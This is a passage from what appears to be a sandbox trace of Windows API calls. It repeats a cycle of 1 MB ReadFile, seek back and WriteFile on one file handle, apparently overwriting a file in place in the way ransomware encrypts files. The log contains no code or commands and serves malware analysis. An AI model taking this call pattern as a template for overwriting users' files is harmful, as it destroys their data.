lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.101] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.101] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.104] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.133] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.133] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.135] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.147] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.147] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.149] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.178] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.178] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.180] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.192] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.192] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.194] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.222] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.222] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.224] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.236] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.236] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.239] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.266] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.266] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.269] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.280] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.280] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.297] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.297] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.300] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.314] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.314] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.317] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.347] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.347] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.349] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.380] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.380] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.382] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.409] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.409] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.411] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.422] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.422] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.425] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.452] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.452] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.455] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.528] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.528] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.530] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.557] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.557] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.560] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.570] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.570] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.573] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.606] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.607] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.609] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.621] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.621] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.623] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.650] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.650] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.652] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.663] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.663] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.666] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.692] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.692] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.694] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.706] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.706] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.708] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.722] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.722] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.724] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.736] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.736] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.738] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.750] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.750] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.752] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0074.763] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.763] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0074.766] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.117] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.117] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.119] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.169] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.169] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.172] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.197] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.197] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.199] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.209] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.209] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.212] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.236] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.236] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.239] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.250] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.250] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.252] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.280] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.280] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.282] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.294] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.294] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.296] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, 